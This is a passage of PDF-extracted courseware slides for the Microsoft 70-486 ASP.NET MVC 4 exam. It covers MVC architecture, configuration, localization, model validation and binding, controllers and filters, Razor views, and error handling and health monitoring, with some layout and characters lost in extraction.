MCSD Web Applications Asp Net Courseware PDF

Microsoft
MCSD: 70-486: Developing

ASP.NET MVC 4 Web
Applications Courseware
Version 1.1
1. 1
Module 1
Exploring ASP.NET MVC 4
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
1. 2
70-486 Exam Guide to Ratio of Questions

Design and
implement
security
Design the
application
architecture
Troubleshoot
and debug web
applications
Design the
user
experience
Develop the
user interface
Developing ASP.NET MVC 4 Web Applications
http://www.microsoft.com/learning/en/us/exam.aspx?ID=70-486
June 2013
155 minutes in total
55 questions in total
31 in main section
3 case studies
(6, 8, 10 questions)
Sep 2013 to Mar 2014
155 minutes in total
45 questions in total
22 in main section
3 case studies
(6, 7, 10 questions)
Time not an issue
Just as much configuration
and architecture as code
Official exam preparation guide does
not give percentages for each section
Microsoft Exam 70-486 Study Guide

http://www.bloggedbychris.com/2012/11/06/microsoft-exam-70-486-study-guide/
1. 3
Estimate of Number of Exam Questions per Module

Module
Qs
1: Exploring ASP.NET MVC 4 & 2: Designing ASP.NET MVC 4 Web Applications
3: Developing ASP.NET MVC 4 Models
4: Developing ASP.NET MVC 4 Controllers
5: Developing ASP.NET MVC 4 Views
6: Testing and Debugging ASP.NET MVC 4 Web Applications
7: Structuring ASP.NET MVC 4 Web Applications
8: Applying Styles to ASP.NET MVC 4 Web Applications
9: Building Responsive Pages in ASP.NET MVC 4 Web Applications
10: Using JavaScript and jQuery for Responsive MVC 4 Web Applications
11: Controlling Access to ASP.NET MVC 4 Web Applications
12: Building a Resilient ASP.NET MVC 4 Web Application
13: Using Windows Azure Web Services in ASP.NET MVC 4 Web Applications
14: Implementing Web APIs in ASP.NET MVC 4 Web Applications
15: Handling Requests in ASP.NET MVC 4 Web Applications
16: Deploying ASP.NET MVC 4 Web Applications
Total questions in exam
45
1. 4
Labs
Follow the instructions at bottom of page 1-27 (position 3, 11014)
Allow NuGet to download missing packages during build
Database for labs 3 to 16 (e.g. position 5, 9295)

The labs tell you to use a Windows Azure SQL Database
Use this server in the connection string instead
Data Source=(localdb)\v11.0
Lab 1: Web Sites are different from Projects
1. 5
Lab 3 (position 5, 7923)

Use the Basic project template NOT the
Empty project template so that you get
Bundle configuration
jQuery libraries for the client-side validation
Shared views for layout
1. 6
Lab 3 (position 5, 8970)

Installing EntityFramework NuGet package
The latest NuGet package for EntityFramework is 6.0.1
Scaffolding in Visual Studio 2012 RTM is not compatible with it!
To install an older version, use the Package Manager Console
install-package EntityFramework version 5.0.0.0
1. 7
Notes
The 70-486 exam is the hardest because it could ask a
question about almost any technology
ADO.NET, Entity Framework, LINQ, JavaScript, jQuery, CSS3,
WCF, Web API, Windows Azure, web architecture, Microsoft
Excel features, and so on
BUT the core of the exam is about ASP.NET MVC 4
In ASP.NET ~ (tilde) means root of web application
For Real-World Prototyping/Intranets (not on exam)
1. 8
ASP.NET Dynamic Data Entities Web Application

An old technology based on Web Forms for building
intranet applications as a client to a database
ASP.NET Dynamic Data Entities Web Application
Add an ADO.NET Entity Data Model
Delete the two .tt files (these create a class that derives from
DbContext that is not compatible with Dynamic Data)
Set Code Generation Strategy to Default (this creates a class
that dervices from ObjectContext that is compatible)
In Global.asax, in RegisterRoutes method, uncomment and
modify the statement to register your ObjectContext class and
scaffold all tables
DefaultModel.RegisterContext(typeof(NorthwindEntities),
new ContextConfiguration() { ScaffoldAllTables = true });
Run the web application!
2. 1
Module 2
Designing ASP.NET MVC 4
Web Applications
Web Applications
Designing ASP.NET MVC 4 Web Applications
2. 2
Contents
Topic
Slide
MVC Architecture
Configuration
Intrinsic Objects
.axd Files
10
Internationalization
11
Future Reading
18
Exam Topic: Plan the application layers

Plan data access
Plan for separation of concerns
Appropriate use of models, views, and controllers
Choose between client-side and server side processing
Design for scalability
Exam Topic: Plan and implement globalization and localization

Plan a localization strategy
Create and apply resources to UI including JavaScript resources
Set cultures
Create satellite resource assemblies
2. 3
MVC
Architecture
http://www.contoso.com/blog/edit/16
1
9
Data Repository is a faade

often implemented as a service
RouteTable
2
Controller
GetBlog(int)
Action1
Action
Result
Model
View
Domain Model
GetBlogs()
3
5
UpdateBlog
(Blog)
partial
classes and
metadata
ViewBag
ViewData
TempData2
CSDL
+ .cs
Entity
Data Model
MSL
SSDL
Data Mapper pattern

SQL Server
7
Partial View
1
2
Uses ModelBinders to map incoming parameters

Uses Session state to pass data beyond current request
2. 4
Configuration
Web Configuration Hierarchy
Visual Studio
Or Web Site
IIS
\Windows\Microsoft.NET\
Framework64\v4.0.30319\Config
<system.web> 
<system.webServer> 
IIS 7 or later is at: \Windows\System32\inetsrv\config\ApplicationHost.config
Configuration
2. 5
External Configuration Sources

A section can load settings from an external file
<configuration>
<pages enableSessionState="false">
<system.web>
<namespaces>
<compilation debug="true">
<pages configSource="pages.config" />
<globalization culture="auto" />
Why?
File-access security and permissions can be used to restrict
access to sections of configuration settings
Settings that are not used during application initialization (e.g.
connection strings) can be modified and reloaded without
requiring an application restart by using this attribute
<configSections>
<section name="pages" ... restartOnExternalChanges="false" />
Intrinsic Objects
2. 6
Using the ASP.NET Intrinsic Objects

HttpContext properties
Application, Cache, Session (dictionaries for storing state
beyond current request, either shared or only for user session)
Items (dictionary for storing state during current request)
TimeStamp, User (information about current request)
Request (everything sent from the browser e.g. cookies)
Response (everything sent to the browser e.g. cookies)
// inside a Controller
HttpContext.Cache.Clear(); // some need HttpContext prefix ...
Debug.WriteLine(Request.Browser.IsMobileDevice); // ... some dont
// inside a View or anywhere else
Debug.WriteLine(HttpContext.Current.Request.Browser.IsMobileDevice);
HttpContext Class
http://msdn.microsoft.com/en-us/library/system.web.httpcontext.aspx
Intrinsic Objects
2. 7
HttpContext and Some of Its Properties
Intrinsic Objects
2. 8
Using the ASP.NET Intrinsic Objects

Inside a Controller all the following are directly
available
HttpContext
Items: good for sharing state through pipeline e.g. HTTP
modules and HTTP handlers
Request
HTTP request as sent from the client (request headers, cookies,
client certificate, form and query string parameters, and so on)
Response
HTTP response sent from the server to the client (response
headers, cookies, and so on)
Session (store state for user session)
Intrinsic Objects
2. 9
Using the ASP.NET Intrinsic Objects on HttpContext

Even inside a Controller all the following need the
HttpContext prefix
HttpContext.Cache
Shared cache for a Web application
HttpContext.Application
Store shared state at application level
HttpContext.ApplicationInstance
Defines the methods, properties, and events that are common
to all application objects in an ASP.NET application
HttpApplication is the base class for applications that are
defined by the user in the Global.asax file
.axd Files
2. 10
What are They?

There are several virtual features of ASP.NET that use
the .axd file extension; they are not real files
WebResource.axd and ScriptResource.axd: load resources such
as JavaScript and JPEGs that have been embedded in
assemblies; an alternative is the newer bundling and
minification feature
Trace.axd: view the trace log for the last n requests; most
useful for Web Forms pages because they show ViewState and
page events
If we dont explicitly warn MVC not to route anything

with .axd in the path then it would try to find a
controller named Trace.axdController!
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
2. 11
What Is It?
Internationalization involves
Localizing the user interface (load any UI text from resource
assemblies) by setting the UICulture property of the thread
Globalizing the code (e.g. DateTime.Now.ToLongDateString())
by setting the Culture property of the thread
ISO defines codes for language-region

en-US: English (United States)
en-GB: English (United Kingdom)
NOT en-UK: MOC is wrong on page 2-13
fr-FR: French (France)
fr-CA: French (Canada)
uiCulture code can be neutral (language only)

ISO 3166-1-alpha-2 code
http://www.iso.org/iso/country_codes/iso_3166_code_lists/country_names_and_code_elements.htm
2. 12
Browser Requests Language Preference

Browser sends its preferred language(s) in header
Accept-Language = "Accept-Language" ":"
1#( language-range [ ";" "q" "=" qvalue ] )
language-range = ( ( 1*8ALPHA *( "-" 1*8ALPHA ) ) | "*" )
Each language-range MAY be given an associated quality value

which represents an estimate of the users preference for the
languages specified by that range. The quality value defaults to
"q=1". For example,
Accept-Language: da, en-gb;q=0.8, en;q=0.7
would mean: I prefer Danish, but will accept British English

and other types of English.
14 Header Field Definitions

http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
2. 13
Internationalizing MVC
There are two localization strategies to incorporate
different languages and cultures in ASP.NET MVC
By dynamically loading resource strings in all views
By using different set of views for every language and locale
Create a class library with .resx files and load in views
ASP.NET MVC 3 Internationalization

http://afana.me/post/aspnet-mvc-internationalization.aspx
2. 14
RESX Files, Satellite Assemblies, and Thread Culture

Visual Studio assigns the ResXFileCodeGenerator
custom tool to .resx files (change to Public version)
This tool embeds the default resources in the main
assembly in the bin folder and creates sub-folders for
other languages and cultures
/bin/MvcApp1.dll: application code and default resources
/bin/fr/MvcApp1.resources.dll: French resources
/bin/fr-CA/MvcApp1.resources.dll: French-Canadian resources
Set globalization so that the thread executing the view

has correct Culture and UICulture properties set based
on browsers Accept-Language header
<globalization uiCulture="auto" culture="auto"/>
2. 15
Loading from Resource Files

When you create resource files (.resx) a class is created
for you for each one and will automatically load the
localized string
/Models/SharedResources.resx (Default - Hello)
/Models/SharedResources.fr.resx (French Bonjour)
/Models/SharedResources.fr-CA.resx (French Canadian
Bonjour Quebec)
In a View
@using MvcSite.Models
In Web.config
in Views folder
@SharedResources.Welcome
<pages>
<namespaces>
<add namespace="MvcSite.Models" />
Resx Files In App_GlobalResources

http://odetocode.com/Blogs/scott/archive/2009/07/16/resource-files-and-asp-net-mvc-projects.aspx
2. 16
Right-to-Left Languages
When writing web pages in Web Forms or MVC, the best
way to make text flow from right to left is to use the
dir (direction) attribute
When the value is set on the html tag the page displays
as a right-to-left page and a vertical scrollbar appears
on the left side
<html dir="rtl">
When the value is set on the body tag, frames and

captions do not inherit right-to-left direction
To override for individual controls, set dir for each
control to ltr
<table dir="ltr">
2. 17
Common Verbs in English, Spanish, French

en
es
fr
en
es
fr
accept
aceptar
accepter
open
abrir
ouvrir
break
romper
casser
close/shut
cerrar
fermer
buy
comprar
acheter
pay
pagar
payer
cancel
cancelar
annuler
put
poner
poser
change
cambiar
changer
read
leer
lire
count
contar
compter
reply
responder
rpondre
cut
cortar
couper
send
enviar
envoyer
draw
dibujar
dessiner
start/begin
comenzar
commencer
explain
explicar
expliquer
translate
traducir
traduire
fill
llenar
remplir
turn off
apagar
teindre
find
encontrar
trouver
turn on
encender
allumer
finish
terminar
terminer
use
utilizar/usar
utiliser
go
ir
aller
wait
esperar
attendre
make/do
hacer
faire
write
escribir
crire
Future Reading
2. 18
ASP.NET MVC
Official Site for ASP.NET MVC
Tutorials, videos, samples, forum, books, open source
http://asp.net/mvc
Free MVC 4 Video Training from Pluralsight
http://www.asp.net/mvc/videos/pluralsight-buildingapplications-with-aspnet-mvc-4
Windows Azure Conference

http://channel9.msdn.com/Events/WindowsAzure/AzureConf2012
Blogs
Phil Haack, http://haacked.com/
Scott Hanselman, http://www.hanselman.com/
3. 1
Module 3
Models
Web Applications
Developing ASP.NET MVC 4 Models
3. 2
Contents
Exam Topic: Design and implement MVC controllers and actions
Implement model binding
3. 3
MOC Errata
Page 03-8 (position 5, 2677)
The MOC says
[AttributeUsage(AttributeTargets.Field)]
It should have said

[AttributeUsage(
AttributeTargets.Field | AttributeTargets.Property)]

To define a SqlClient connection string they should use (but
dont have to due to backwards compatibility)
Data Source instead of server
Initial Catalog instead of database
Integrated Security instead of trusted_connection
Persist Security Info instead of PersistSecurityInfo
3. 4
MVC Models
Metadata Annotations
System.ComponentModel
[Display(Name = "First Name")]
[DisplayName("First Name")]: used by label

(deprecateduse Display instead because it can be localized*)
[ReadOnly(true)]: make property read-only
System.Web.Mvc
[HiddenInput] public Guid ID { get; set; }
[HiddenInput]: invisible to user but posted with form
System.ComponentModel.DataAnnotations
[DisplayFormat(HtmlEncode = false, NullDisplayText = "Unpaid",
DataFormatString = "{0:c}", ConvertEmptyStringToNull = true,
ApplyFormatInEditMode = false)]
// will not be included at all
public decimal Salary { get; set; }
[ScaffoldColumn(false)]
*DisplayAttribute.ResourceType Property
http://msdn.microsoft.com/en-us/library/system.componentmodel.dataannotations.displayattribute.resourcetype(v=vs.110).aspx
3. 5
MVC Models
Validation Metadata Annotations

ValidationAttribute is abstract base class
ErrorMessage (non-localized string)
ErrorMessageResourceType (e.g. Shared)
ErrorMessageResourceName (e.g. HW)
Derived classes
DataType enumeration
Custom
Text
[DataType(DateType.Date)]
DateTime
Html
[Range(18, 65)]
Date
MultilineText
[RegularExpression(@"\d+")]
Time
EmailAddress
[Required(AllowEmptyStrings=false)]
Duration
Password
[StringLength(50)]
PhoneNumber
Url
Currency
ImageUrl
[StringLength(14, MinimumLength = 6,
ErrorMessage = "Password must be between 6 and 14 characters.")]
public string Password { get; set; }
MVC Models
3. 6
Custom Validation
Two techniques for custom validation
CustomValidationAttribute
Inherit from ValidationAttribute (see next slide)
Create a class with a static method

public class MyValidator {
public static bool CheckPassword(object value) {
return true; // if value is valid
Apply attribute to a property on your model

[CustomValidation(typeof(MyValidator), "CheckPassword",
ErrorMessage = "Between 6 and 14 characters.")]
MVC Models
3. 7
Custom Validation
[AttributeUsage(AttributeTargets.Field | AttributeTargets.Property,
AllowMultiple = false)]
public class ValidatePasswordLengthAttribute : ValidationAttribute
{ // public so they can be set with named parameters
public int MinimumCharacters { get; set; }
public int MaximumCharacters { get; set; }
public ValidatePasswordLengthAttribute(int minChars = 6) : base()
{
MinimumCharacters = minChars;
}
public override bool IsValid(object value)
{
var s = (value as string);
return ((s != null) && (s.Length >= MinimumCharacters)
&& (s.Length <= MaximumCharacters));
}
}
[ValidatePasswordLength(8, MaximumCharacters = 12)]
MVC Models
3. 8
Using a Partial Class to Apply Metadata

If you auto-generate your model using a tool like an
Entity Data Model then you cannot apply attributes to
the code because you will loose them next time it regenerates so you must use a partial class with the
MetadataType attribute
[MetadataType(typeof(BlogMetadata))]
public partial class Blog
{
public class BlogMetadata
{ // only need to include properties that need attributes
[Required(ErrorMessage = "Title is required")]
public object Title { get; set; }
[Required(ErrorMessage = "Blog is required")]
public object Blog { get; set; }
}
}
MVC Models
3. 9
Model Binders
There are five model binders built-in to ASP.NET MVC
DefaultModelBinder (most commonly used)
HttpPostedFileBaseModelBinder
ByteArrayModelBinder
LinqBinaryModelBinder
CancellationTokenModelBinder
MVC Models
3. 10
DefaultModelBinder
Maps a browser request to a data object
Provides a concrete implementation of a model binder
Maps the following types to a browser request

Primitive types, such as String, Double, Decimal, or DateTime
Model classes, such as Person, Address, or Product
Collections, such as ICollection<T>, IList<T>, or

IDictionary<TKey, TValue>
MVC Models
3. 11
Custom Model Binders

Implement System.Web.Mvc.IModelBinder
using System.Web.Mvc;
public class FullnameModelBinder : IModelBinder {
public object BindModel(ControllerContext cc, ModelBindingContext mbc) {
ModelBindingContext has ValueProvider to get parameters

var fullName = mbc.ValueProvider.GetValue("fullname");
dynamic parts = fullName.RawValue.ToString().Split(' ');
string firstName = parts[0];
string lastName = parts[1];
Splitting DateTime - Unit Testing ASP.NET MVC Custom Model Binders

http://www.hanselman.com/blog/SplittingDateTimeUnitTestingASPNETMVCCustomModelBinders.aspx
6 Tips for ASP.NET MVC Model Binding

http://odetocode.com/blogs/scott/archive/2009/04/27/6-tips-for-asp-net-mvc-model-binding.aspx
MVC Models
3. 12
Registering and Applying a Model Binder

In Global.asax
To replace the default model binder
ModelBinders.Binders.DefaultBinder = new FirebrandModelBinder();
To add or insert a new model builder for a specific type before

any existing model binders for that type
public ActionResult Edit(Person p) {
ModelBinders.Binders.Add(
typeof(Person), new PersonBinder());
In a controller
To apply to a specific action argument
public ActionResult Edit(
[ModelBinder(typeof(FirstNameBinder))] string firstName,
[ModelBinder(typeof(AgeBinder))] int age) {
The Features and Foibles of ASP.NET MVC Model Binding
http://msdn.microsoft.com/en-us/magazine/hh781022.aspx
Entity Framework
3. 13
Database Initializers
System.Data.Entity has several initializers
CreateDatabaseIfNotExists<TContext>: will recreate and
optionally re-seed the database only if the database doesnt
exist
DropCreateDatabaseAlways<TContext>: will always recreate
and optionally re-seed the database the first time that a
context is used in the app domain
DropCreateDatabaseIfModelChanges<TContext>: will delete,

recreate, and optionally re-seed the database only if the model
has changed since the database was created
MigrateDatabaseToLatestVersion<TContext,
TMigrationsConfiguration>: will use Code First Migrations to
update the database to the latest version
For all, create a derived class and override the Seed method
Database.SetInitializer<TContext> Method
http://msdn.microsoft.com/en-us/library/gg679461(v=vs.113).aspx
Windows Azure SQL Database
3. 14
Create the Database
3. 15
Wait for Database to be Created
3. 16
Manage allowed IP addresses
Click ADD TO THE ALLOWED IP ADDRESSES
3. 17
Get the Connection String
3. 18
Manage the Database Structure and Data
4. 1
Module 4
Controllers
Web Applications
4. 2
Developing ASP.NET MVC 4 Controllers
Contents
Topic
Page 04-4
Slide
Action Filters
Passing Data to a View
ActionResult
The MOC says

Photo firstPhoto = context.Photos.ToList()[0];
It should have said

Photo firstPhoto = context.Photos.FirstOrDefault();
Exam Topic: Design and implement MVC controllers and actions
Apply authorization attributes and global filters
Implement action behaviors
Implement action results
Exam Topic: Control application behavior by using MVC extensibility points
Implement MVC filters and controller factories
4. 3
Action Filters
Types of Action Filter

Action filters are custom attributes that provide a
declarative means to add pre-action and post-action
behavior to controller action methods
There are built-in filters like [Authorize], [AllowAnonymous],
[HandleError], and you can create custom ones
Authorization filters Make security decisions about

whether to execute an action method
Action filters Wrap the action method execution
Result filters Wrap the ActionResult
Exception Filters Execute if there is an unhandled

exception thrown in the action method
4. 4
Action Filters
When Do They Trigger?

Authorization filter
Before an action is executed
Action filter
OnActionExecuting
OnActionExecuted
Result filter
OnResultExecuting
OnResultExecuted
[MyCustomActionFilter]
[MyCustomResultFilter]
public ActionResult Index()
{
// fetch model
return View(model);
}
// response is returned
Exception filter
Only when an unhandled exception happens
4. 5
Action Filters
Implement a Custom Filter

Inherit from ActionFilterAttribute, then override any of
the four methods you want to use
public class MyCustomActionFilter : ActionFilterAttribute
{
public overrides OnActionExecuting( // before action executes
public overrides OnActionExecuted( // after action executes
public overrides OnResultExecuting( // before results returned
public overrides OnResultExecuted( // after results returned
ActionFilterAttribute implements
IActionFilter: OnActionExecuting, OnActionExecuted
IResultFilter: OnResultExecuting, OnResultExecuted
ActionFilterAttribute inherits from FilterAttribute
Warning!
System.Web.Mvc NOT System.Web.Http.Filters
Passing Data to a View
4. 6
ViewBag
ViewData is a dictionary of objects that is derived from
ViewDataDictionary and accessible using strings as keys
ViewData["Message"] = "Hello world!";
ViewBag is a dynamic property that takes advantage of

the new dynamic features in C# 4.0 and later
ViewBag.Message = "Hello world!";
TempData is a dictionary that stores values in Session

(by default*) and persists until the next request
Anything you put into TempData is discarded after the next
request completes, for example, a redirect
What is ViewData, ViewBag and TempData?
http://www.codeproject.com/Articles/476967/WhatplusisplusViewData-2cplusViewBagplusandplusTem
*ASP.NET MVC: Do You Know Where Your TempData Is?

http://www.gregshackles.com/2010/07/asp-net-mvc-do-you-know-where-your-tempdata-is/
4. 7
ActionResult
Derived Types and Helper Methods of Controller

Derived Type
Description
ContentResult
Returns a user-defined content type

public ActionResult GetPlainText() {
return Content("Hello world");
EmptyResult
Returns a null result
FileResult
Returns a binary file
JavaScriptResult
Returns JavaScript
JsonResult
Returns a serialized Json object

public ActionResult GetJsonObject() {
return Json(new { firstName="Bob", age=42 },
JsonRequestBehavior.AllowGet);
PartialViewResult
Renders a partial view
RedirectResult
Redirects to another action method by using its URL
RedirectToRouteResult
Redirects to another action method
ViewResult
Renders a .cshtml or .aspx view
return View();
5. 1
Module 5
Views
Web Applications
Developing ASP.NET MVC 4 Views
5. 2
Contents
Exam Topic: Compose the UI layout of an application
Implement partials for reuse in different areas of the application
Design and implement pages by using Razor templates (Razor view engine)
Exam Topic: Plan for search engine optimization and accessibility
Use analytical tools to parse HTML
View and evaluate conceptual structure by using plugs-in for browsers
Write semantic markup (HTML5 and ARIA) for accessibility, for example, screen readers
C# Razor Syntax Quick Reference

http://haacked.com/archive/2011/01/06/razor-syntax-quick-reference.aspx
5. 3
MOC Errata
Page 05-32
Task 3: Complete the photo gallery partial view.
6. After the if statement, add a P element, and call the
@Html.DisplayFor helper to render the words Created By:
followed by the value of the item.UserName property.
7. After the UserName display controls, add a P element, and call
the @Html.DisplayFor helper to render the words Created On:
followed by the value of the item.CreatedDate property.
It should say DisplayNameFor
MVC Views
5. 4
Highlighting Razor Code

Make it easier to spot razor code
Menu: Tools-Options
Environment-Fonts and Colors
Display items: Razor Code
Item background: choose a more visible colour than light grey
5. 5
MVC Views
What is the Model?

In a strongly-typed view, the Model object will be of
the type specified by @model directive
Which should match the type of object passed to View() helper
@model MvcApp.Models.Blog
@Model.Title
Html helper methods take a lambda which allows you

to declare a local variable name for the Model
Visual Studio uses model for the name by default
Inside for loops, lambda variables (like x below) still refer to
the model for the view; we must use the loop variable instead
@model MvcApp.Models.Customer
@Html.DisplayFor(model => model.CompanyName) has @Model.Orders.Count orders.
@foreach (var order in Model.Orders)
@Html.DisplayFor(x => order.OrderID)
MVC Views
5. 6
Feature with Models in Views

When using DisplayNameFor with IEnumerable models,
the lambda local variable still uses a single instance
With DisplayFor, model is
IEnumerable<Customer>
With DisplayNameFor, model is
a single Customer
The lab views sometimes

use this feature to
simplify lambdas
With DisplayFor, we have to
use item, NOT modelItem
In DisplayNameFor, we can
use model
5. 7
MVC Views
Importing Namespaces into Views

For all views, edit Web.config in Views folder
<system.web.webPages.razor>
<pages pageBaseType="System.Web.Mvc.WebViewPage">
<namespaces>
<add namespace="System.Web.Mvc" />
<add namespace="System.Web.Mvc.Ajax" />
<add namespace="System.Web.Mvc.Html" />
<add namespace="System.Web.Optimization"/>
<add namespace="System.Web.Routing" />
For a single view, add using directive at top of file

@using MvcApp.Models
@model Shipper
5. 8
MVC Views
Displayers and Editors

Visual Studio tools create code to output strings for
displaying or text boxes and validation for creating or
editing
<div>ProductID</div>
<div>@Model.ProductID</div>
@Html.LabelFor(m => m.ProductID)
@Html.TextBoxFor(m => m.ProductID)
@Html.ValidationMessageFor(m => m.ProductID)
You can change this to use DisplayFor and EditorFor

These can read the metadata in your model for hints for how to
output your data
[DisplayFormat(DataFormatString="{0:c}"]
@Html.DisplayFor(model => model.Salary)
@Html.EditorFor(model => model.Email)
5. 9
MVC Views
Defining Custom Displayers

By default, properties are rendered as strings
Order.OrderDate 08-02-2011 16:44
Customer.Email fred@test.com
Create a custom display by adding a partial view named

EmailDisplayer to DisplayTemplates under Shared or
specific view folder
<a href="mailto:@Model">@Model</a>
EmailDisplayer
To explicitly specify the view to use

@Html.DisplayFor(model => model.Email, "EmailDisplayer")
ASP.NET MVC Templates - http://bradwilson.typepad.com/blog/2009/10/aspnet-mvc-2-templates-part-1introduction.html/
MVC Views
5. 10
Defining Custom Editors

MVC Model
Associate a web user control with a property
[UIHint("RatingsDropDown")]
public string Rating { get; set; }
MVC View
Add the partial view (RatingsDropDown.cshtml) in EditorTemplates
@Html.DropDownList("", new SelectList(new [] {
"Excellent", "Good", "Average", "Poor" }, Model))
Generate the editor for the property

@Html.EditorFor(model => model.Rating)
5. 11
MVC Views
Html.RenderPartial (faster) and Html.Partial

Note
RenderPartial writes
directly to the response
stream so it is faster.
Partial returns a string
so it can be used in a
Razor expression.
Renders the specified partial view

@model Customer

<h2>Orders</h2>
@{ Html.RenderPartial("_ListOrders"); }
2
_ListOrders.cshtml
@Html.Partial("_ListOrders")
When a partial view is created it gets its own copy of the ViewBag
so if it changes the ViewBag then the parents copy is not affected
But changes to the Model are affected!
You can explicitly pass a subset of the parents Model

@{ Html.RenderPartial("_ListOrders", subsetOfModel); }
RenderPartialExtensions.RenderPartial Method - http://msdn.microsoft.com/enus/library/system.web.mvc.html.renderpartialextensions.renderpartial.aspx
5. 12
MVC Views
Html.ActionLink
Creates an anchor tag with a path defined by a route
that calls an action method on a controller
Text to show
Action name
Controller name (optional)
@Html.ActionLink("Show Blog", "ShowBlog", "Blog", null,

new { @class = "cool", target = "_blank" })
Route values
HTML attributes
Would render this onto the HTML page

<a href="/Blog/ShowBlog" target="_blank" class="cool">Show Blog</a>
...and when clicked would call this action method

public class BlogController : Controller {
public ActionResult ShowBlog() {
5. 13
MVC Views
Html.Action and Html.RenderAction

Calls an action method on the controller and returns
the results as a string into the current view
@model Customer

<h2>Orders</h2>
@Html.Action("ListOrders", Model)
1
public class CustomerController : Controller
{
[ChildActionOnly]
public PartialViewResult ListOrders(Customer c)
{
List<Order> orders = GetOrders(c.CustomerID);
2
return PartialView("_ListOrders", orders);
@{ Html.RenderAction
("ListOrders", Model); }
Note
RenderAction returns
the results directly to
the response stream so
provides better
performance.
Useful if you need to get more data from the model
MVC Views
5. 14
ChildActionOnly Attribute
Designed for use with
Html.Action and Html.RenderAction
@Html.Action("GetMoreModelData")
These two methods can be used in a view to call back

to a controller action in order to get more model data
[ChildActionOnly]
public PartialViewResult GetMoreModelData()
An external call should not normally be allowed to

directly call these actions so we apply ChildActionOnly
But you cannot call an action with ChildActionOnly applied using
Ajax.ActionLink because it makes an external call so in this case
leave off the attribute
Using ChildActionOnly in MVC
http://stackoverflow.com/questions/10253769/using-childactiononly-in-mvc
MVC Views
5. 15
HTML5 Features for Accessibility

You can use HTML5 to improve accessibility
Give content elements descriptive names
Apply ARIA (Accessible Rich Internet Application) attributes

<li role="menuitem" aria-haspopup="true" aria-labelledby="fileLabel">
<span id="fileLabel">File</span>

<li role="menuitem" aria-haspopup="false">New</li>
Use the new semantic markup elements appropriately, e.g.

article, aside, figcaption, figure, footer, header, hgroup,
mark, nav, section, time
Accessible Rich Internet Applications (WAI-ARIA) 1.0
http://www.w3.org/WAI/PF/aria/
HTML5 Part 1: Semantic Markup and Page Layout

http://blogs.msdn.com/b/jennifer/archive/2011/08/01/html5-part-1-semantic-markup-and-page-layout.aspx
6. 1
Module 6
Testing and Debugging ASP.NET
MVC 4 Web Applications
Web Applications
Testing and Debugging ASP.NET MVC 4 Web Applications
6. 2
Contents
Topic
Slide
Error Handling
Debugging
Health Monitoring
Testing
13
System.Diagnostics 24
.Contracts
Exam Topic: Prevent and troubleshoot runtime issues

Troubleshoot performance, security, and errors
Implement tracing, logging (including using attributes
for logging), and debugging (including IntelliTrace)
Enforce conditions by using code contracts
Enable and configure health monitoring (including
Performance Monitor)
Exam Topic: Design an exception handling strategy
Handle exceptions across multiple layers
Display custom error pages using global.asax or creating
your own HTTPHandler or set web.config attributes
Handle first chance exceptions
Exam Topic: Test a web application
Create and run unit tests, for example, use the Assert
class, create mocks
Create and run web tests
Error Handling
6. 3
Defining Custom Errors

customErrors element can redirect unhandled .NET
exceptions and HTTP status code errors
<customErrors defaultRedirect="CustomErrorView"
mode="RemoteOnly" >
<error statusCode="404" redirect="Errors/Error404"/>

<error statusCode="500" redirect="Errors/Error500"/>
</customErrors>
Mode: Off (default), On, RemoteOnly

When Off, unhandled errors cause ASP.NET to generate an error
page that shows code including the line that caused the error
You can detect if it is on at runtime by using
HttpContext.IsCustomErrorEnabled
Error Handling
6. 4
Global Filters
Global filters are useful to set up global error handlers
public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
filters.Add(new HandleErrorAttribute
{
ExceptionType = typeof(DivideByZeroException),
View = "CustomException"
});
}
Exercise 1: Creating a Global Action Filter

http://msdn.microsoft.com/en-us/vs2010trainingcourse_aspnetmvcglobalanddynamicactionfilters_topic2.aspx
6. 5
Debugging
Configuring
Debugging for a web site is
controlled via two settings
Project Properties, Web, Debuggers,

ASP.NET (enabled by default)
Web.config (disabled by default)
<compilation debug="true" />
In Machine.config, if deployment is
set to retail then debug and trace
output is disabled and custom
errors are always on
<system.web>
<deployment retail="true" />
Debugging
6. 6
When Exceptions are Thrown

If you have written exception handling code but need to monitor
the internal state of your application when a CLR exception is
thrown, choose Debug-Exceptions and select the Thrown check box
Debugging
6. 7
Remote Sites
Visual Studio and IIS on different machines
\Program Files\Microsoft Visual Studio 10.0\Common7\IDE
\Remote Debugger\x86\msvsmon.exe
Run on the remote server prior to debugging (no need to install)
Msvsmon started a new server named user@machine
Administrative rights allow debugging under a different identity
Both machines must be in the same domain or workgroup
Remote debugging with Visual Studio 2010

http://www.codeproject.com/Articles/146838/Remote-debugging-with-Visual-Studio-2010
Debugging
6. 8
Client-Side Script
By default, client-side script debugging is disabled in
Internet Explorer
Unselect the box to enable debugging
6. 9
Health Monitoring
What Is It?
Events can be intercepted and recorded throughout the
lifetime of an application
Starting or ending a Web application
Successful and unsuccessful authentication attempts
ASP.NET errors
Custom application events
Events inherit from WebBaseEvent

Derived classes include: WebManagementEvent, WebAuditEvent,
WebRequestEvent, WebHeartBeatEvent, WebBaseErrorEvent,
WebErrorEvent, WebRequestErrorEvent, and so on
ASP.NET includes several event providers that listen to

those events (next slide)
6. 10
Health Monitoring
Event Providers
All inherit from abstract WebEventProvider class
Override ProcessEvent method to implement your own
EventLogWebEventProvider
Writes to a Windows event log
SqlWebEventProvider
Writes to SQL Server Express ASPNETDB in

App_Data folder by default
WmiWebEventProvider
Writes to WMI
SimpleMailWebEventProvider
TemplatedMailWebEventProvider
Sends an e-mail message
TraceWebEventProvider
Writes to the ASP.NET Trace
Providers are not configured and do not subscribe to

any events by default
Except EventLogWebEventProvider, which is configured to write
exceptions and failed security audits to event log
Health Monitoring
6. 11
Configuring
Configured in the <healthMonitoring> section
<healthMonitoring heartBeatInterval="5" enabled="true">
<providers>
Configure which providers are available and where they

will write to
<bufferModes>
Configure how providers are buffered so that they are

transmitted in batches to avoid overloading the system
<eventMappings>
Associates event names (such as All Errors and Failure

Audits) with the classes that implement them
<rules>
Maps event types with event providers
<profiles>
Configure how many events can occur within a specific

time limit
minInterval
Before another event is logged (non-critical use higher values)
Health Monitoring
6. 12
Custom Extensions
Create custom extensions with IWebEventCustomEvaluator
Allows enabling or disabling the firing of a specific event
Especially useful when you implement your own custom event and
want to control the rate at which it is sent to the related provider
for processing
using System.Web.Management;
public class SampleWebBaseEvent : WebBaseEvent, IWebEventCustomEvaluator
{
